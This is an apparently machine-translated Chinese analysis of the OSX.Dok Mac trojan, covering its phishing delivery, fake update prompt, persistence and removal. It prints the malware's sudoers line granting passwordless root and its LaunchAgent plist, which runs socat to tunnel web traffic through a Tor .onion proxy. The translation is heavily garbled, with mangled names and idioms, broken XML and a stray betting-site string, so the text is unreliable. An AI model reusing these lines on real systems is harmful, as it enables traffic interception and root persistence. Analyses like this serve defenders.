新的OSX.DOK Malware拦截Web流量

大多数Mac恶意软件都很简单。虽然它有一些相当粗糙和尴尬的方面，一个新的Mac恶意软件，被称为OSX。Dok，打破了那种典型的模式。

osx.dok，它是检查点发现，使用复杂的手段来监视 - 和潜在地改变所有HTTP和HTTPS流量到来自受感染的MAC。这意味着恶意软件例如能够为任何网站用户登录的帐户凭据捕获帐户凭据，这为盗窃现金和数据提供了许多机会。

此外，OSX.DOK可以修改发送的数据，以便将用户重定向到恶意网站代替合法的目的。

分配方法

OSX。Dok以文件名的形式出现dookument.zip.zip.，发现被电子邮件向受害者发送给网络钓鱼电子邮件。受害者主要位于欧洲。

如果受害者中了这个骗局，ZIP文件会被解压成一个名为“document”的文件，(奇怪的是)这个文件的图标与旧版本的苹果预览应用程序相同。这与可以通过预览打开的文档的图标不同。此外，这个图标被奇怪地像素化了，这应该会引起一些警告用户的注意。

行为分析

当然，这个“文件”实际上是一个应用程序。幸运的是，当用户尝试打开这个应用程序时，麦克斯将显示一个标准通知来警告该事实的用户：

苹果已经撤销了用于签名应用程序的证书，因此，在这一点上，任何人遇到这种恶意软件将无法打开应用程序，也无法被其感染。

如果用户点击逾期警告以打开应用程序，它将显示一个警告，即无法打开文件，这只是一个封面，因为没有任何文档打开的事实：

有趣的是，这个窗口不能被取消，因为OK按钮没有响应。此外，应用程序将在相当长的一段时间内停留在这种模式。如果用户在这一点上变得可疑，并试图强制退出应用程序，它将不会出现在强制退出应用程序窗口和活动监视器，它将显示为“AppStore”。

然而，如果用户试图迫使这个“AppStore”应用程序退出，一切还不是很好。恶意软件投放者会把自己复制到/用户/共享/文件夹并将其自身添加到用户的登录项，因此它将在下次登录时重新打开以继续传染机器的过程。

几分钟后，该应用程序将用假更新通知掩盖整个屏幕。

由于恶意软件在用户的登录项中，这将保存在屏幕上并将重新启动。如果用户单击“更新”按钮，则恶意软件将请求管理员密码。

Malware将在此模式下保持一段时间，使计算机无法使用，直到它完成。这与任何正常的麦斯科斯更新过程和所有密切熟悉麦克斯熟悉的人都会知道有些错误，但那些不了解更好的人很容易被愚弄，思考这是一个重要的安全更新的正常过程。

一旦用户提供了管理密码，恶意软件就会更改/私人/ etc / sudoers文件，它控制对Unix shell中sudo命令的访问。在sudoers文件的末尾添加如下一行:

测试所有=（全部）NoPasswd：全部

此行指定在这种情况下指示的用户 - “测试” - 允许在不需要密码的情况下使用sudo，确保恶意软件能够继续持续的根级权限，而无需继续申请管理员密码。

同时，安装时间长还有一个很好的原因:OSX。Dok将忙于使用其非法获得的根权限在后台安装各种软件，包括macOS命令行开发工具，它将安装的其他工具需要这些工具。

恶意软件还将安装Homebrew，命令行安装系统。依次将依次用于下载和安装其他工具，包括Tor和Socat。恶意软件将使用这些进程通过恶意代理服务器汇集所有HTTP和HTTPS流量。

两个文件将安装在用户中Laungents.文件夹重定向此流量。其中的第一个，命名com.apple.safari.pac.plist.有以下内容：

<？xml version = " 1.0 " encoding = " utf - 8 " ?> < !DOCTYPE plist PUBLIC "-//Apple//DTD plist 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">   KeepAlive  Label com.apple.Safari。pac ProgramArguments  /usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykukonion:80,socksport=9050  RunAtLoad  StandardErrorPath /dev/null StandardOutPath /dev/null WorkingDirectory /usr/local  

第二，命名com.apple.safari.proxy.plist.，具有相同的内容，除了它使用端口5588代替端口5555和80。

作为裤子中的添加踢，OSX.DOK在系统中安装了一个新的可信根证书，名称“Comodo RSA扩展验证安全服务器CA 2.”使用此证书，它可以令人信服地令人信服地模拟任何网站，作为篡改Web流量的过程的一部分。

一切都完成，恶意软件删除自己/用户/共享/几乎没有留下它存在的明显迹象。的Laungents.文件夹是某些用户可能被注意到的唯一变更，许多人不会明白这些.Plist文件实际上并不与Apple相关联。

移动

通过简单地移除前面的两个，可以通过删除恶意软件来实现Laungents.文件，但对不容易反转的系统有许多剩菜和修改。应该反转对sudoers文件的更改，并且可以使用好文本编辑器（如bbedit）轻松执行知识渊博的用户，但对该文件进行了错误的更改可能会导致严重问题。

一个Laungents.文件命名homebrew.mxcl.tor.plist也将安装。由于这是一个合法的文件，它不应该被检测为恶意，但没有安装的人已经应该删除它。

应使用钥匙串访问应用程序（在Applications文件夹中的实用程序文件夹中找到）从系统keychain中删除错误证书。

安装了许多合法的命令行工具，由数万个文件组成，不能轻易删除。

更新: Dok的一些后续版本也修改了/etc/hosts文件。应该从备份中恢复，或者手动编辑将其恢复到正常状态。

消费者

必威平台APPMalwarebytes Anti-Malware for Mac将检测这个恶意软件的重要组成部分，如OSX。Dok，使主动感染失效。然而，当涉及到不容易逆转的其他更改时(这些更改会引入漏洞和潜在的行为更改)，就需要采取额外的措施。对于那些对终点站和系统的神秘角落不了解的人来说，寻求专家的帮助，或者删除硬盘驱动器，并从感染前做的备份中恢复系统，将是明智的。

企业

对业务的影响可能更严重，因为它可能会揭露可能允许攻击者获得公司资源的信息。例如，考虑潜在的损坏，如果感染，您访问了一个内部公司页面，为如何连接到公司VPN和访问内部公司服务提供说明。恶意软件将为恶意代理服务器发送所有信息。

如果您已在商业环境中被此恶意软件感染，则应咨询您的IT部门，因此他们可以意识到风险并开始减轻它们。

托马斯里德